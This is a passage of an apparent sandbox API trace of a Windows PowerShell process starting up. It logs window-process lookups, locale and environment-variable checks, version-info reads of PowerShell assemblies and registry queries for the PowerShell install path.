lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x4f4 [0074.796] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x794 [0074.796] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x458 [0074.796] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0xcd680 | out: lpdwProcessId=0xcd680) returned 0x778 [0074.800] WerSetFlags () returned 0x0 [0074.809] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1 [0074.809] CoTaskMemFree (pv=0x0) [0074.810] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xcd9e8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcd9e0 | out: pulNumLanguages=0xcd9e8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcd9e0) returned 1 [0074.811] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xcd9e8, pwszLanguagesBuffer=0x2d31510, pcchLanguagesBuffer=0xcd9e0 | out: pulNumLanguages=0xcd9e8, pwszLanguagesBuffer=0x2d31510, pcchLanguagesBuffer=0xcd9e0) returned 1 [0074.817] CoTaskMemAlloc (cb=0x24) returned 0x1ed4f0 [0074.817] GetUserDefaultLocaleName (in: lpLocaleName=0x1ed4f0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6 [0074.817] CoTaskMemFree (pv=0x1ed4f0) [0074.848] CoTaskMemAlloc (cb=0x104) returned 0x1ef390 [0074.848] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.848] CoTaskMemFree (pv=0x1ef390) [0074.851] CoTaskMemAlloc (cb=0x104) returned 0x1ef390 [0074.851] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.851] CoTaskMemFree (pv=0x1ef390) [0074.853] CoTaskMemAlloc (cb=0x104) returned 0x1ef390 [0074.853] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.853] CoTaskMemFree (pv=0x1ef390) [0074.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.864] SetErrorMode (uMode=0x1) returned 0x1 [0074.864] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xcd660 | out: lpFileInformation=0xcd660*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0074.864] SetErrorMode (uMode=0x1) returned 0x1 [0074.864] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xcd8d0 | out: lpdwHandle=0xcd8d0) returned 0x94c [0074.865] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d34da0 | out: lpData=0x2d34da0) returned 1 [0074.866] VerQueryValueW (in: pBlock=0x2d34da0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcd848, puLen=0xcd840 | out: lplpBuffer=0xcd848*=0x2d34e3c, puLen=0xcd840) returned 1 [0074.866] VerQueryValueW (in: pBlock=0x2d34da0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xcd7b8, puLen=0xcd7b0 | out: lplpBuffer=0xcd7b8*=0x2d34f18, puLen=0xcd7b0) returned 1 [0074.866] lstrlenW (lpString="Microsoft Corporation") returned 21 [0074.866] CoTaskMemAlloc (cb=0x2e) returned 0x2009a0 [0074.866] lstrcpyW (in: lpString1=0x2009a0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0074.866] CoTaskMemFree (pv=0x2009a0) [0074.866] VerQueryValueW (in: pBlock=0x2d34da0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xcd7b8, puLen=0xcd7b0 | out: lplpBuffer=0xcd7b8*=0x2d34f6c, puLen=0xcd7b0) returned 1 [0074.866] lstrlenW (lpString="System.Management.Automation") returned 28 [0074.866] CoTaskMemAlloc (cb=0x3c) returned 0x1f6ee0 [0074.866] lstrcpyW (in: lpString1=0x1f6ee0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0074.867] CoTaskMemFree (pv=0x1f6ee0) [0074.867] VerQueryValueW (in: pBlock=0x2d34da0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xcd7b8, puLen=0xcd7b0 | out: lplpBuffer=0xcd7b8*=0x2d34fc8, puLen=0xcd7b0) returned 1 [0074.867] lstrlenW (lpString="6.1.7601.17514") returned 14 [0074.867] CoTaskMemAlloc (cb=0x20) returned 0x1fb570 [0074.867] lstrcpyW (in: lpString1=0x1fb570, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0074.867] CoTaskMemFree (pv=0x1fb570) [0074.867] VerQueryValueW (in: pBlock=0x2d34da0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xcd7b8, puLen=0xcd7b0 | out: lplpBuffer=0xcd7b8*=0x2d35008, puLen=0xcd7b0) returned 1 [0074.867] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0074.867] CoTaskMemAlloc (cb=0x44) returned 0x1f6ee0 [0074.867] lstrcpyW (in: lpString1=0x1f6ee0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0074.867] CoTaskMemFree (pv=0x1f6ee0) [0074.867] VerQueryValueW (in: pBlock=0x2d34da0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xcd7b8, puLen=0xcd7b0 | out: lplpBuffer=0xcd7b8*=0x2d35070, puLen=0xcd7b0) returned 1 [0074.867] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0074.867] CoTaskMemAlloc (cb=0x76) returned 0x194b80 [0074.867] lstrcpyW (in: lpString1=0x194b80, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0074.867] CoTaskMemFree (pv=0x194b80) [0074.867] VerQueryValueW (in: pBlock=0x2d34da0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xcd7b8, puLen=0xcd7b0 | out: lplpBuffer=0xcd7b8*=0x2d3510c, puLen=0xcd7b0) returned 1 [0074.867] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0074.867] CoTaskMemAlloc (cb=0x44) returned 0x1f6ee0 [0074.867] lstrcpyW (in: lpString1=0x1f6ee0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0074.867] CoTaskMemFree (pv=0x1f6ee0) [0074.867] VerQueryValueW (in: pBlock=0x2d34da0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xcd7b8, puLen=0xcd7b0 | out: lplpBuffer=0xcd7b8*=0x2d35170, puLen=0xcd7b0) returned 1 [0074.867] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0074.868] CoTaskMemAlloc (cb=0x58) returned 0x15ae40 [0074.868] lstrcpyW (in: lpString1=0x15ae40, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0074.868] CoTaskMemFree (pv=0x15ae40) [0074.868] VerQueryValueW (in: pBlock=0x2d34da0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xcd7b8, puLen=0xcd7b0 | out: lplpBuffer=0xcd7b8*=0x2d351ec, puLen=0xcd7b0) returned 1 [0074.868] lstrlenW (lpString="6.1.7601.17514") returned 14 [0074.868] CoTaskMemAlloc (cb=0x20) returned 0x1fb570 [0074.868] lstrcpyW (in: lpString1=0x1fb570, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0074.868] CoTaskMemFree (pv=0x1fb570) [0074.868] VerQueryValueW (in: pBlock=0x2d34da0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xcd7b8, puLen=0xcd7b0 | out: lplpBuffer=0xcd7b8*=0x2d34e94, puLen=0xcd7b0) returned 1 [0074.868] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0074.868] CoTaskMemAlloc (cb=0x66) returned 0x16ed90 [0074.868] lstrcpyW (in: lpString1=0x16ed90, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0074.868] CoTaskMemFree (pv=0x16ed90) [0074.868] VerQueryValueW (in: pBlock=0x2d34da0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xcd7b8, puLen=0xcd7b0 | out: lplpBuffer=0xcd7b8*=0x0, puLen=0xcd7b0) returned 0 [0074.868] VerQueryValueW (in: pBlock=0x2d34da0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xcd7b8, puLen=0xcd7b0 | out: lplpBuffer=0xcd7b8*=0x0, puLen=0xcd7b0) returned 0 [0074.868] VerQueryValueW (in: pBlock=0x2d34da0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xcd7b8, puLen=0xcd7b0 | out: lplpBuffer=0xcd7b8*=0x0, puLen=0xcd7b0) returned 0 [0074.868] VerQueryValueW (in: pBlock=0x2d34da0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcd788, puLen=0xcd780 | out: lplpBuffer=0xcd788*=0x2d34e3c, puLen=0xcd780) returned 1 [0074.868] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0074.868] VerLanguageNameW (in: wLang=0x0, szLang=0x1a3a10, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0074.868] CoTaskMemFree (pv=0x1a3a10) [0074.868] VerQueryValueW (in: pBlock=0x2d34da0, lpSubBlock="\\", lplpBuffer=0xcd7d8, puLen=0xcd7d0 | out: lplpBuffer=0xcd7d8*=0x2d34dc8, puLen=0xcd7d0) returned 1 [0074.879] CoTaskMemAlloc (cb=0x104) returned 0x1ef390 [0074.879] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.879] CoTaskMemFree (pv=0x1ef390) [0074.883] CoTaskMemAlloc (cb=0x104) returned 0x1ef390 [0074.883] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.884] CoTaskMemFree (pv=0x1ef390) [0074.888] lstrlenW (lpString="䅁") returned 1 [0074.901] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd6a8 | out: phkResult=0xcd6a8*=0x308) returned 0x0 [0074.903] RegOpenKeyExW (in: hKey=0x308, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd698 | out: phkResult=0xcd698*=0x30c) returned 0x0 [0074.903] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd728 | out: phkResult=0xcd728*=0x310) returned 0x0 [0074.907] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd66c, lpData=0x0, lpcbData=0xcd668*=0x0 | out: lpType=0xcd66c*=0x1, lpData=0x0, lpcbData=0xcd668*=0x56) returned 0x0 [0074.908] CoTaskMemAlloc (cb=0x5a) returned 0x16eee0 [0074.908] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd63c, lpData=0x16eee0, lpcbData=0xcd638*=0x56 | out: lpType=0xcd63c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd638*=0x56) returned 0x0 [0074.908] CoTaskMemFree (pv=0x16eee0) [0074.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.944] CoTaskMemAlloc (cb=0x104) returned 0x1ef390 [0074.944] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.944] CoTaskMemFree (pv=0x1ef390) [0075.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0075.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0075.288] CoTaskMemAlloc (cb=0x104) returned 0x1ef4a0 [0075.288] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef4a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0075.288] CoTaskMemFree (pv=0x1ef4a0) [0075.290] CoTaskMemAlloc (cb=0x104) returned 0x1ef4a0 [0075.290] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef4a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0075.290] CoTaskMemFree (pv=0x1ef4a0) [0075.327] CoTaskMemAlloc (cb=0x104) returned 0x1ef4a0 [0075.327] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef4a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0075.327] CoTaskMemFree (pv=0x1ef4a0) [0075.329] CoTaskMemAlloc (cb=0x104) returned 0x1ef4a0 [0075.329] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef4a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0075.329] CoTaskMemFree (pv=0x1ef4a0) [0075.330] CoTaskMemAlloc (cb=0x104) returned 0x1ef4a0 [0075.330] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef4a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0075.330] CoTaskMemFree (pv=0x1ef4a0) [0075.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcd260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0075.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcd260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0075.544] CoTaskMemAlloc (cb=0x104) returned 0x1ef4a0 [0075.544] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef4a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0075.544] CoTaskMemFree (pv=0x1ef4a0) [0075.548] CoTaskMemAlloc (cb=0x104) returned 0x1ef4a0 [0075.548] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef4a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0075.548] CoTaskMemFree (pv=0x1ef4a0) [0075.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0075.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcd260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0076.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcd260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0076.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0076.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0076.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcd260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0076.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcd260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0076.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcd260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0076.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcd260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0076.695] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0076.695] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0076.695] CoTaskMemFree (pv=0x1ef6c0) [0076.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0076.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0076.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0076.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0076.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0xcd380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0076.776] SetErrorMode (uMode=0x1) returned 0x1 [0076.776] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0xcd600 | out: lpFileInformation=0xcd600*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0076.776] SetErrorMode (uMode=0x1) returned 0x1 [0076.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0076.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0076.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd3b0, lpFilePart=0x0 | out: 